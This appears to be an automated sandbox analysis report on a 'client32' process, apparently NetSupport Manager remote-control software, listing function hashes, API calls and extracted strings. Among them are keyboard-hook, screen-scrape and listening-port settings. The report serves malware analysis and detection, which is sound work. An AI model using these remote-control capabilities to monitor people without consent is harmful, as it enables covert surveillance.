Instruction ID: 75a99128c0b90555870f3e8937819581192e292699187335c5c1593c45ddfd72
Opcode Fuzzy Hash: e0b6bd059d40e8bf96b5d004e74531d37e7b08b111a0edfbe0187c58173b03f5
Instruction Fuzzy Hash: EEE2D174E41261AFEB11DB64DCC8F9EF7A5AB4930CF5081A9ED18A7384EB706D40CB61

Function 1102C2A0 Relevance: 79.4, APIs: 15, Strings: 30, Instructions: 614
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

client32, xrefs: 1102C5C5
multipoint=%d, softxpand=%d, pid=%d, xrefs: 1102CB80
client32.ini, xrefs: 1102C4F5
$session$, xrefs: 1102CA26
TCPIP, xrefs: 1102C6A5
e:\nsmsrc\nsm\1201\1201f2\ctl32\NSMString.h, xrefs: 1102C9E4, 1102CA63
Warning: Unexpanded clientname=<%s>, xrefs: 1102C963
Error x%x reading %s, sesh=%d, xrefs: 1102C551
MacAddress, xrefs: 1102C79A
DisableConsoleClient, xrefs: 1102C607
ListenPort, xrefs: 1102C6A0
Wtsapi32.dll, xrefs: 1102C6CC
client32 dbi %hs, xrefs: 1102CB33
TSMode, xrefs: 1102C680
18/03/14 09:15:42 V12.01F3, xrefs: 1102CB2E
WTSFreeMemory, xrefs: 1102C7CC
%02d, xrefs: 1102C9A8
%s.%02d, xrefs: 1102C9C0
%session%, xrefs: 1102CA3A
IsA(), xrefs: 1102C9E9, 1102CA68
screenscrape, xrefs: 1102C6B8
NSM.LIC, xrefs: 1102C2C2
computername=%s, clientname=%s, tsmode=%d, vui=%d, vsvc=%d, xrefs: 1102CB5A
NSMWClass, xrefs: 1102C484
580913, xrefs: 1102C8B0, 1102CA7B, 1102CA9F, 1102CAAC, 1102CADC, 1102CB51
Client, xrefs: 1102C685, 1102C6BD, 1102C79F
ClientName, xrefs: 1102C850
%sessionname%, xrefs: 1102C9F9, 1102CA12
, xrefs: 1102C820
WTSQuerySessionInformationA, xrefs: 1102C738

Memory Dump Source

Source File: 00000003.00000002.4453609467.0000000011001000.00000020.00000001.01000000.00000004.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.4453594023.0000000011000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453711288.0000000011181000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111CD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111DC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.00000000111E1000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.000000001120E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011215000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011241000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011332000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: _malloc_memsetwsprintf
String ID: $$session$$%02d$%s.%02d$%session%$%sessionname%$18/03/14 09:15:42 V12.01F3$580913$Client$ClientName$DisableConsoleClient$Error x%x reading %s, sesh=%d$IsA()$ListenPort$MacAddress$NSM.LIC$NSMWClass$TCPIP$TSMode$WTSFreeMemory$WTSQuerySessionInformationA$Warning: Unexpanded clientname=<%s>$Wtsapi32.dll$client32$client32 dbi %hs$client32.ini$computername=%s, clientname=%s, tsmode=%d, vui=%d, vsvc=%d$e:\nsmsrc\nsm\1201\1201f2\ctl32\NSMString.h$multipoint=%d, softxpand=%d, pid=%d$screenscrape
API String ID: 3802068140-1296648010
Opcode ID: 89c6ebedb6418807c2bc6bc77c788040729ab3efca6a0b42e82c3566aa8e0dfb
Instruction ID: 1eedb420cbd5dfcbbda3fd0d1686de8f37d34dfb32158dca5f9b22f0844981e9
Opcode Fuzzy Hash: 89c6ebedb6418807c2bc6bc77c788040729ab3efca6a0b42e82c3566aa8e0dfb
Instruction Fuzzy Hash: 1232D575D002659FDB11DF94CD84BEEB7B9AB44308F8485E9E918A7280EB706B84CF61

Function 6CC72380 Relevance: 72.2, APIs: 11, Strings: 30, Instructions: 403
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_memset.LIBCMT ref: 6CC723A7

Strings

A1=%s, xrefs: 6CC7272F
CLIENT_VERSION=1.0, xrefs: 6CC72550
PORT=%d, xrefs: 6CC725E8
APPTYPE=%d, xrefs: 6CC7285D
MAXPACKET=%d, xrefs: 6CC72581
CMD=OPEN, xrefs: 6CC72539
A2=%s, xrefs: 6CC72789
CLIENT_NAME=%s, xrefs: 6CC72597
*ER, xrefs: 6CC7289D
*Gsk, xrefs: 6CC724A4
CLIENT_ADDR=%s, xrefs: 6CC725CA
ER=%s, xrefs: 6CC728B2
client247, xrefs: 6CC7268F, 6CC726EB, 6CC72751, 6CC727AB, 6CC72805
GSK=%s, xrefs: 6CC7264C
connection_index == 0, xrefs: 6CC723FA
PROTOCOL_VER=%u.%u, xrefs: 6CC7256B
CMPI=%u, xrefs: 6CC7266A
HOSTNAME=%s, xrefs: 6CC7261A
580913, xrefs: 6CC7258C
CHATID=%s, xrefs: 6CC726C6
e:\nsmsrc\nsn\300\cva_300f1\ctl32\htctl.c, xrefs: 6CC723F5
*Dept, xrefs: 6CC72874
1.1, xrefs: 6CC7247C
CHATID, xrefs: 6CC7268A
DEPT=%s, xrefs: 6CC7288C
ListenPort, xrefs: 6CC7245A
Port, xrefs: 6CC7244A
A3=%s, xrefs: 6CC727E3
TCPIP, xrefs: 6CC7244F, 6CC7245F
A4=%s, xrefs: 6CC7283D

Memory Dump Source

Source File: 00000003.00000002.4454008542.000000006CC61000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC60000, based on PE: true

Associated: 00000003.00000002.4453991803.000000006CC60000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4454042754.000000006CC9E000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4454061749.000000006CCA7000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4454077712.000000006CCA8000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4454077712.000000006CCAC000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4454111296.000000006CCAF000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6cc60000_client32.jbxd

Similarity

API ID: _memset
String ID: *Dept$*ER$*Gsk$1.1$580913$A1=%s$A2=%s$A3=%s$A4=%s$APPTYPE=%d$CHATID$CHATID=%s$CLIENT_ADDR=%s$CLIENT_NAME=%s$CLIENT_VERSION=1.0$CMD=OPEN$CMPI=%u$DEPT=%s$ER=%s$GSK=%s$HOSTNAME=%s$ListenPort$MAXPACKET=%d$PORT=%d$PROTOCOL_VER=%u.%u$Port$TCPIP$client247$connection_index == 0$e:\nsmsrc\nsn\300\cva_300f1\ctl32\htctl.c
API String ID: 2102423945-1194233936
Opcode ID: 5dd5b8615c176b2ccbd7b8196fc4a403a1069cd66986283c14d4960aca6b428d
Instruction ID: 6d4d19cca19b9069a32bead20118246eee31d344c33a06e8bcac07d2f991e16b
Opcode Fuzzy Hash: 5dd5b8615c176b2ccbd7b8196fc4a403a1069cd66986283c14d4960aca6b428d
Instruction Fuzzy Hash: 15E18472901618ABCB60DBA49C94EEF7378EF49359F0405C9E509A7A41FB749B888F60

Function 111329C0 Relevance: 66.6, APIs: 20, Strings: 18, Instructions: 134
libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000,8504C483,759223A0), ref: 111329F3
LoadLibraryA.KERNEL32(?), ref: 11132A3C
LoadLibraryA.KERNEL32(DBGHELP.DLL), ref: 11132A55
LoadLibraryA.KERNEL32(IMAGEHLP.DLL), ref: 11132A64
GetModuleHandleA.KERNEL32(?), ref: 11132A6A
GetProcAddress.KERNEL32(00000000,SymGetLineFromAddr), ref: 11132A7E
GetProcAddress.KERNEL32(00000000,SymGetLineFromName), ref: 11132A9D
GetProcAddress.KERNEL32(00000000,SymGetLineNext), ref: 11132AA8
GetProcAddress.KERNEL32(00000000,SymGetLinePrev), ref: 11132AB3
GetProcAddress.KERNEL32(00000000,SymMatchFileName), ref: 11132ABE
GetProcAddress.KERNEL32(00000000,StackWalk), ref: 11132AC9
GetProcAddress.KERNEL32(00000000,SymCleanup), ref: 11132AD4
GetProcAddress.KERNEL32(00000000,SymLoadModule), ref: 11132ADF
GetProcAddress.KERNEL32(00000000,SymInitialize), ref: 11132AEA
GetProcAddress.KERNEL32(00000000,SymGetOptions), ref: 11132AF5
GetProcAddress.KERNEL32(00000000,SymSetOptions), ref: 11132B00
GetProcAddress.KERNEL32(00000000,SymGetModuleInfo), ref: 11132B0B
GetProcAddress.KERNEL32(00000000,SymGetSymFromAddr), ref: 11132B16
GetProcAddress.KERNEL32(00000000,SymFunctionTableAccess), ref: 11132B21
GetProcAddress.KERNEL32(00000000,MiniDumpWriteDump), ref: 11132B2C

Part of subcall function 1107C480: _strrchr.LIBCMT ref: 1107C48E

Strings

SymFunctionTableAccess, xrefs: 11132B18
SymGetSymFromAddr, xrefs: 11132B0D
SymCleanup, xrefs: 11132ACB
MiniDumpWriteDump, xrefs: 11132B23
SymGetModuleInfo, xrefs: 11132B02
StackWalk, xrefs: 11132AC3
dbghelp.dll, xrefs: 11132A18
SymGetOptions, xrefs: 11132AEC
SymGetLineFromName, xrefs: 11132A97
SymLoadModule, xrefs: 11132AD6
SymInitialize, xrefs: 11132AE1
SymGetLinePrev, xrefs: 11132AAA
IMAGEHLP.DLL, xrefs: 11132A5E, 11132A63, 11132A69
SymSetOptions, xrefs: 11132AF7
SymGetLineFromAddr, xrefs: 11132A78
SymMatchFileName, xrefs: 11132AB5
DBGHELP.DLL, xrefs: 11132A4F, 11132A54
SymGetLineNext, xrefs: 11132A9F

Memory Dump Source

Source File: 00000003.00000002.4453609467.0000000011001000.00000020.00000001.01000000.00000004.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.4453594023.0000000011000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453711288.0000000011181000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111CD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111DC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.00000000111E1000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.000000001120E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011215000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011241000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011332000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: AddressProc$LibraryLoad$Module$FileHandleName_strrchr
String ID: DBGHELP.DLL$IMAGEHLP.DLL$MiniDumpWriteDump$StackWalk$SymCleanup$SymFunctionTableAccess$SymGetLineFromAddr$SymGetLineFromName$SymGetLineNext$SymGetLinePrev$SymGetModuleInfo$SymGetOptions$SymGetSymFromAddr$SymInitialize$SymLoadModule$SymMatchFileName$SymSetOptions$dbghelp.dll
API String ID: 3874234733-2061581830
Opcode ID: 11dbdab2167a41d006a5ed8c47bb96ee5bc3ae62b79fc54799e77c40f532fad6
Instruction ID: a998bf938f72bd3d62f1ab24a8fee8fc38cc82ed36c591295b0484b214843149
Opcode Fuzzy Hash: 11dbdab2167a41d006a5ed8c47bb96ee5bc3ae62b79fc54799e77c40f532fad6
Instruction Fuzzy Hash: D8419275A00B54AFD7209F769C84AABFBF8FF95614B00492EE546D3A10E771EE00CB54

Function 111308E0 Relevance: 59.8, APIs: 15, Strings: 19, Instructions: 285
libraryloaderregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNEL32(User32.dll,Client,DisableDPIAware,00000000,00000000,00000000,00000000), ref: 11130951
GetProcAddress.KERNEL32(00000000,SetProcessDPIAware), ref: 1113098C
SetLastError.KERNEL32(00000078), ref: 1113099F
FreeLibrary.KERNEL32(00000000), ref: 111309B1
LoadLibraryA.KERNEL32(imm32,?,?,00000000,00000000), ref: 111309D4
GetClassInfoExA.USER32(11000000,NSMWClass,?), ref: 11130A39
_memset.LIBCMT ref: 11130A4D
LoadCursorA.USER32(00000000,00007F00), ref: 11130A9D
GetStockObject.GDI32(00000000), ref: 11130AA7
LoadLibraryA.KERNEL32(pcihooks,?,?,00000000,00000000), ref: 11130B51
GetProcAddress.KERNEL32(00000000,HookKeyboard), ref: 11130B66
RegisterClassExA.USER32(?), ref: 11130ABE

Part of subcall function 11059580: __wcstoi64.LIBCMT ref: 110595BD

SetTimer.USER32(00000000,00000000,000003E8,1112CAF0), ref: 11130C7C
#17.COMCTL32(?,?,?,00000000,00000000), ref: 11130CAA
LoadLibraryA.KERNEL32(riched32.dll,?,?,?,00000000,00000000), ref: 11130CB5

Strings

_License, xrefs: 11130A00
User32.dll, xrefs: 1113094C
imm32, xrefs: 111309CA
NSMWClass, xrefs: 11130A2B, 11130AB7
_debug, xrefs: 11130BC0
Client, xrefs: 11130937
pcihooks, xrefs: 11130B4C
*quiet, xrefs: 111309FB
SetProcessDPIAware, xrefs: 11130983
Inited VolumeControl., xrefs: 11130CE9
HookKeyboard, xrefs: 11130B60
riched32.dll, xrefs: 11130CB0
Initing VolumeControl..., xrefs: 11130CC4
DisableDPIAware, xrefs: 11130932
NSMGetAppIcon(), xrefs: 11130A7A
InitUI (%d), xrefs: 1113090F
TraceCopyData, xrefs: 11130BBB
View, xrefs: 11130BA0
UI.CPP, xrefs: 11130A75, 11130AD0

Memory Dump Source

Source File: 00000003.00000002.4453609467.0000000011001000.00000020.00000001.01000000.00000004.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.4453594023.0000000011000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453711288.0000000011181000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111CD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111DC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.00000000111E1000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.000000001120E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011215000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011241000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011332000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: LibraryLoad$AddressClassProc$CursorErrorFreeInfoLastObjectRegisterStockTimer__wcstoi64_memset
String ID: *quiet$Client$DisableDPIAware$HookKeyboard$InitUI (%d)$Inited VolumeControl.$Initing VolumeControl...$NSMGetAppIcon()$NSMWClass$SetProcessDPIAware$TraceCopyData$UI.CPP$User32.dll$View$_License$_debug$imm32$pcihooks$riched32.dll
API String ID: 2794364348-1986316466
Opcode ID: 515253d7f1545cb5aae5051ee3a7f6a71433c7a55e90cf05d6b349b9ad956a9d
Instruction ID: aa8012bde1adae0a2c02f567617443f2e4728d78ef366c72babd61b7604c4b4a
Opcode Fuzzy Hash: 515253d7f1545cb5aae5051ee3a7f6a71433c7a55e90cf05d6b349b9ad956a9d
Instruction Fuzzy Hash: FAB1AFB8D12266EFDB00DFA5CDC8A9EFBB4BB8431DB10453DE91997248EB305900CB51

Function 110A1F30 Relevance: 56.2, APIs: 27, Strings: 5, Instructions: 236
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNEL32(setupapi.dll,2F623E72,?,00000000,00000000,?,?,?,?,?,?,?,?,?,00000000,11172BD8), ref: 110A1F63
GetProcAddress.KERNEL32(00000000,SetupDiGetClassDevsA), ref: 110A1F87
SetupDiGetClassDevsA.SETUPAPI(11194154,00000000,00000000,00000012,?,?,?,?,?,?,?,?,?,00000000,11172BD8,000000FF), ref: 110A1FA1
GetProcAddress.KERNEL32(00000000,SetupDiEnumDeviceInterfaces), ref: 110A1FCC
_free.LIBCMT ref: 110A2000
GetProcAddress.KERNEL32(00000000,SetupDiGetDeviceInterfaceDetailA), ref: 110A2012
GetLastError.KERNEL32 ref: 110A203D
_malloc.LIBCMT ref: 110A2053
GetProcAddress.KERNEL32(00000000,SetupDiGetDeviceInterfaceDetailA), ref: 110A2075
SetLastError.KERNEL32(00000078,?,?,?,?,?,?,?,?,?,00000000,11172BD8,000000FF,?,1102D836,Client), ref: 110A20A7
SetLastError.KERNEL32(00000078), ref: 110A20BB
GetLastError.KERNEL32 ref: 110A20C1
_free.LIBCMT ref: 110A20D3
SetLastError.KERNEL32(00000078), ref: 110A20E4
SetLastError.KERNEL32(00000078), ref: 110A20F1
_free.LIBCMT ref: 110A2104
FreeLibrary.KERNEL32(?,?), ref: 110A2114
FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,00000000,11172BD8,000000FF,?,1102D836,Client), ref: 110A21B8

Strings

SetupDiGetClassDevsA, xrefs: 110A1F7B
SetupDiGetDeviceInterfaceDetailA, xrefs: 110A200C, 110A206F
setupapi.dll, xrefs: 110A1F5B
SetupDiEnumDeviceInterfaces, xrefs: 110A1FC6
SetupDiDestroyDeviceInfoList, xrefs: 110A2160

Memory Dump Source

Source File: 00000003.00000002.4453609467.0000000011001000.00000020.00000001.01000000.00000004.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.4453594023.0000000011000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453711288.0000000011181000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111CD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111DC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.00000000111E1000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.000000001120E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011215000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011241000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011332000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: ErrorLast$AddressProc$Library_free$Free$ClassDevsLoadSetup_malloc
String ID: SetupDiDestroyDeviceInfoList$SetupDiEnumDeviceInterfaces$SetupDiGetClassDevsA$SetupDiGetDeviceInterfaceDetailA$setupapi.dll
API String ID: 3464732724-3340099623
Opcode ID: 8631525b7a5e93e28e66912bba9e3c0ed5781fd796cf49be40848ab7fa216824
Instruction ID: dee8c5d27a7d1561559e6d59ec9b4eaefc10bb237f0b189c7ffb99ba61846665
Opcode Fuzzy Hash: 8631525b7a5e93e28e66912bba9e3c0ed5781fd796cf49be40848ab7fa216824
Instruction Fuzzy Hash: 578196B5E40229AFD701DFE5ED84FDEBBB9AF55744F044134F912A6280DB74A501CB60

Function 111251E0 Relevance: 52.8, APIs: 16, Strings: 14, Instructions: 278
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 11059580: __wcstoi64.LIBCMT ref: 110595BD

LoadLibraryA.KERNEL32(psapi.dll,_debug,CheckLeaks,00000001,00000000,2F623E72), ref: 11125275

Part of subcall function 110098C0: LoadLibraryA.KERNEL32(Kernel32.dll,75920BD0,111252A0), ref: 110098C8

LoadLibraryA.KERNEL32(User32.dll), ref: 111252A5
GetCurrentProcess.KERNEL32 ref: 111252FE
GetProcAddress.KERNEL32(?,GetProcessHandleCount), ref: 11125326
GetProcessHandleCount.KERNEL32(?,?), ref: 1112533A
SetLastError.KERNEL32(00000078), ref: 11125340
GetProcAddress.KERNEL32(00000000,GetGuiResources), ref: 1112534C
SetLastError.KERNEL32(00000078), ref: 11125373
GetProcAddress.KERNEL32(?,GetGuiResources), ref: 11125388
SetLastError.KERNEL32(00000078), ref: 111253A5
GetProcAddress.KERNEL32(?,GetProcessMemoryInfo), ref: 111253B7
K32GetProcessMemoryInfo.KERNEL32(?,?,00000028), ref: 111253CA
SetLastError.KERNEL32(00000078), ref: 111253D0
FreeLibrary.KERNEL32(?), ref: 1112553A
FreeLibrary.KERNEL32(?), ref: 11125547
FreeLibrary.KERNEL32(?), ref: 11125551

Strings

RestartMB, xrefs: 1112548B
User32.dll, xrefs: 111252A0
_debug, xrefs: 11125232
Client, xrefs: 11125490, 111254BB, 111254E2, 11125509
GetProcessHandleCount, xrefs: 11125320
Used handles=%d, gdiObj=%d, userObj=%d, mem=%u kB, xrefs: 11125442
RestartGdiObj, xrefs: 111254DD
GetGuiResources, xrefs: 11125346, 1112537F
CheckLeaks, xrefs: 1112522D
GetProcessMemoryInfo, xrefs: 111253B1
RestartHandles, xrefs: 111254B6
RestartUserObj, xrefs: 11125504
psapi.dll, xrefs: 11125252
r>b/, xrefs: 11125561

Memory Dump Source

Source File: 00000003.00000002.4453609467.0000000011001000.00000020.00000001.01000000.00000004.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.4453594023.0000000011000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453711288.0000000011181000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111CD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111DC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.00000000111E1000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.000000001120E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011215000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011241000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011332000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Library$AddressErrorLastProc$FreeLoadProcess$CountCurrentHandleInfoMemory__wcstoi64
String ID: CheckLeaks$Client$GetGuiResources$GetProcessHandleCount$GetProcessMemoryInfo$RestartGdiObj$RestartHandles$RestartMB$RestartUserObj$Used handles=%d, gdiObj=%d, userObj=%d, mem=%u kB$User32.dll$_debug$psapi.dll$r>b/
API String ID: 4101391659-372940361
Opcode ID: 24f660dc49cf8063fb080170bf677cd14817b3fe85e91263a94df8b88c7d28d1
Instruction ID: 9932062f5be36f07512d72675ff71bbfb044ef1448ff26fd2a4877b11468836e
Opcode Fuzzy Hash: 24f660dc49cf8063fb080170bf677cd14817b3fe85e91263a94df8b88c7d28d1
Instruction Fuzzy Hash: AAB125B0E05269AFDF50DFA9C8C4BDDFBB5BB48308F60446AE51AE7240EA705940CF51

Function 1102C369 Relevance: 45.8, APIs: 7, Strings: 19, Instructions: 303
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNEL32(Wtsapi32.dll,Client,screenscrape,00000001,00000003,TCPIP,ListenPort,00000000,00000003,00000003,?,?,?,?,?,?), ref: 1102C6D1

Strings

screenscrape, xrefs: 1102C6B8
multipoint=%d, softxpand=%d, pid=%d, xrefs: 1102CB80
computername=%s, clientname=%s, tsmode=%d, vui=%d, vsvc=%d, xrefs: 1102CB5A
580913, xrefs: 1102C8B0, 1102CADC, 1102CB51
client32.ini, xrefs: 1102C4F5
Client, xrefs: 1102C685, 1102C6BD, 1102C79F
TCPIP, xrefs: 1102C6A5
ClientName, xrefs: 1102C850
Error x%x reading %s, sesh=%d, xrefs: 1102C551
MacAddress, xrefs: 1102C79A
ListenPort, xrefs: 1102C6A0
DisableConsoleClient, xrefs: 1102C607
Wtsapi32.dll, xrefs: 1102C6CC
client32 dbi %hs, xrefs: 1102CB33
, xrefs: 1102C820
WTSQuerySessionInformationA, xrefs: 1102C738
TSMode, xrefs: 1102C680
18/03/14 09:15:42 V12.01F3, xrefs: 1102CB2E
WTSFreeMemory, xrefs: 1102C7CC

Memory Dump Source

Source File: 00000003.00000002.4453609467.0000000011001000.00000020.00000001.01000000.00000004.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.4453594023.0000000011000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453711288.0000000011181000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111CD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111DC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.00000000111E1000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.000000001120E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011215000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011241000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011332000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID: $18/03/14 09:15:42 V12.01F3$580913$Client$ClientName$DisableConsoleClient$Error x%x reading %s, sesh=%d$ListenPort$MacAddress$TCPIP$TSMode$WTSFreeMemory$WTSQuerySessionInformationA$Wtsapi32.dll$client32 dbi %hs$client32.ini$computername=%s, clientname=%s, tsmode=%d, vui=%d, vsvc=%d$multipoint=%d, softxpand=%d, pid=%d$screenscrape
API String ID: 1029625771-1054026545
Opcode ID: 51ce0cb698c89ac2dff6d9995eb7453489367b24b68214fb0bf9422c444a7224
Instruction ID: ca0982745070245b62b0d9423a17b587d5718592cb53d7dfc1a06a055831e232
Opcode Fuzzy Hash: 51ce0cb698c89ac2dff6d9995eb7453489367b24b68214fb0bf9422c444a7224
Instruction Fuzzy Hash: 09B1A475E002659FDB22DF948D84BEDF7B9BB45318F8481E9E90CA7244DB706A808F61

Function 11027150 Relevance: 42.5, APIs: 2, Strings: 22, Instructions: 542
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000104,6FBA1370,?,0000001A), ref: 1102723D
_strrchr.LIBCMT ref: 1102724C

Part of subcall function 11152F3C: __stricmp_l.LIBCMT ref: 11152F79

Strings

\, xrefs: 110271CC
product.dat, xrefs: 11027200, 11027251
NSSAppDataDir, xrefs: 11027585
SupportsAndroid, xrefs: 110276E2
TechConsole, xrefs: 1102767D
SupportEMail, xrefs: 11027525
NSSName, xrefs: 11027495
SupportWWW, xrefs: 110274F5
ShortName, xrefs: 11027405
AssistantURL, xrefs: 11027619
AssistantName, xrefs: 110275EC
NSSConfName, xrefs: 110275B5
NSSLongCaption, xrefs: 110276B5
SupportsChrome, xrefs: 11027646
LongName, xrefs: 110273D5
Home, xrefs: 11027435
NSMAppDataDir, xrefs: 11027555
Name, xrefs: 1102739E
??I, xrefs: 11027857
??F, xrefs: 110277D0
NSSTLA, xrefs: 110274C5
TLA, xrefs: 11027465

Memory Dump Source

Source File: 00000003.00000002.4453609467.0000000011001000.00000020.00000001.01000000.00000004.sdmp, Offset: 11000000, based on PE: true

